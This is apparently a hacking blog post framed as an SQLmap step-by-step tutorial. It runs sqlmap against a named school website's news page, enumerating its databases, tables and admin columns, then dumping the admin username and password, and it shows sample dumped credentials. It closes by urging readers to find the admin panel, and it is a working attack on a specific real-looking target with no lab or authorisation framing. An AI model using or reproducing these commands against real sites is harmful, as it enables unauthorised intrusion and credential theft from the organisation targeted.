Subscribe For Free Updates!

We'll not spam mate! We promise.

Wednesday, 7 August 2013

SQLmap Step by Step Tutorial

SQLmap Step by Step Tutorial
Today we will learn how to operate the "best SQL injection exploiting tool" i.e SQLMAP
its a python tool , and it is preloaded in almost every Back Track version

first of all
we need a vulnerable target!
here it is 
http://www.alliedschools.edu.pk/main_news.php?news_id=52
ok first step is to  fatch the databases 
command will be like this one

 python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 --dbs

here:- 
       -u is stand for which is vulnerable to SQL injection
 and   --dbs is used for fatching total databases in website :D



ok after completing the process of fataching the databases it will something like that 

available databases(8)
[*]informtion_schema
[*]alliedschools_web
now we are going to expoit database alliedschools_web and fatch the tables present in it XD

ok command will change a little bit :-

python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_web --tables

here :-
        -D and then name of the database from which we want to fatch tables and 
        --tables is for fatching total table present in the database 

after processing we will get the tables present in database  "alliedschools_web"




after processing we will get something like that 
  Database: alliedschools_campus
   [18 Tables ]
   admin
   campus
   ......
   ......
now we are going to fatch the cloumns from table admin of database alliedschools_campus

  command is :-
               python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_campus -T admin --columns



now we will get something like this 
   Database: alliedschools_campus
   Table : admin 
   [12 columns ]
    admin_password
    admin_username
    admin_email
    ......
    ......

 This is  the last command to get the admin username and password  
   command is 
             python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_campus -T admin -C admin_password,                                admin_username --dump
and after finishing process we will get something like that 
     Database: alliedschools_campus
     Table : admin 
      [6 entries]
     admin_password   admin_username
     $erver             admin
     ......             ......
Now You Have admin Password of website, Find admin panel and ...xD
Ceridts To : Zero & Team indishell :D


Socialize This Post
SOCIALIZE IT →
FOLLOW →
SHARE IT →

0 comments:

Post a Comment